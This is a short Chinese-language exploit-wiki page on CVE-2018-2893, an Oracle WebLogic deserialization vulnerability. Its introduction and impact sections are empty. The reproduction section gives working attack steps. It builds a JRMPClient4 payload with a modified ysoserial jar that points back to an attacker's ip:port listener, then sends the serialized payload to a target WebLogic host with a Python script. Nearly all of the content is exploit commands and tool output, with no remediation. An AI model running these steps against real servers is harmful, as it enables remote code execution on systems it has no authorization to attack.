CVE-2018-2893

一、漏洞简介

二、漏洞影响

三、复现过程

https://github.com/ianxtianxt/CVE-2018-2893

Step 1

java -jar ysoserial-cve-2018-2893.jar

WHY SO SERIAL?
Usage: java -jar ysoserial-[version]-all.jar [payload] '[command]'
Available payload types:
     Payload     Authors   Dependencies
     -------     -------   ------------
     JRMPClient  @mbechler
     JRMPClient2 
     JRMPClient3 
     JRMPClient4 
     Jdk7u21     @frohoff

Step 2

java -jar ysoserial-cve-2018-2893.jar JRMPClient4 "<ip>:<port>" > poc4.ser

Step 3

python weblogic.py <host> <port> poc4.ser

零组资料文库 all right reserved,powered by 0-sec.org未经授权禁止转载 2019-11-19 12:18:02

results matching ""

    No results matching ""